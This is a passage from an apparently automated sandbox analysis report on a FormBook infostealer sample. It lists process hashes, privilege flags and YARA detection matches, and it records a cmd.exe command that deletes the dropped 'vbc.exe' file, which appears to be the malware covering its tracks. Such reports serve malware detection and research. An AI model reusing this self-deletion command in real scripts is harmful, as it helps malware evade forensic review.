                              MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2391163751.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2391163751.00000000001A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2391163751.00000000001A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2391208418.00000000001D0000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2391208418.00000000001D0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2391208418.00000000001D0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                              Reputation:high

                              Analysis Process: cmd.exe PID: 2224 Parent PID: 2232

                              General

                              Start time:11:28:11
                              Start date:20/11/2020
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:/c del 'C:\Users\Public\vbc.exe'
                              Imagebase:0x4a550000
                              File size:302592 bytes
                              MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Disassembly

                              Code Analysis

                              Reset < >